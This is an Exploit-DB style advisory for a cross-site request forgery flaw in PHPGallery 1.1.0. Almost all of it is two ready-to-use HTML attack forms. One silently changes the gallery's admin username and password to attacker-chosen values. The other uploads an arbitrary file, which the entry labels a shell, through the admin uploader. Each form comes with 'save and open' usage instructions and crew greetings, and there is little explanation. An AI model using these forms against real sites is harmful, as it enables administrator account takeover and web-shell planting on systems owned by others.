PHPGallery 1.1.0 - CSRF Vulnerability

2010-11-19T00:00:00
ID EDB-ID:15573
Type exploitdb
Reporter Or4nG.M4N
Modified 2010-11-19T00:00:00

Description

PHPGallery 1.1.0 - CSRF Vulnerability. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------------------
# Software      : phpgallery v 1.1.0                                                                                :                                               
# Author        : Or4nG.M4N                                               
# Date          : n/a    
# Dork          : Forbidden   
# Software Link: http://www.hotscripts.com/listing/phpgallery/                                                                                          :
-------------------------------------------------------------------------
  +---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>               
<body>                                                                     
<form action="http://domain/[pwd]/admin/do_change_info.php" method="post"> 
<br>                                                                       
<input name="username" id="username" type="text" value="Or4nG" >           
<br>                                                                       
<input name="password" id="password" type="password" value="Ro0t" >        
<br>                                                                     
<input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">

how to use: copy This code and seve in file csrf.html > and open Enjoy


          +---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+   
<html>                                                                     
<head>                                                                     
<title>REMOTE CSRF upload ShElL by OR4NG.M4N</head>               
<body>		  
 <form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
Choose a file to upload to the gallery:<br>                                
<input name="uploadedfile" type="file" />                                  
<p align="left">Picture Caption:<br>                                       
<input name="caption" type="text" id="caption" size="45">                  
<p align="left">                                                           
<input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />

how to use: copy This code and seve in file csrf.html > and open Enjoy

--------------------------------------------------------
# Email - priv8te@hotmail.com
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------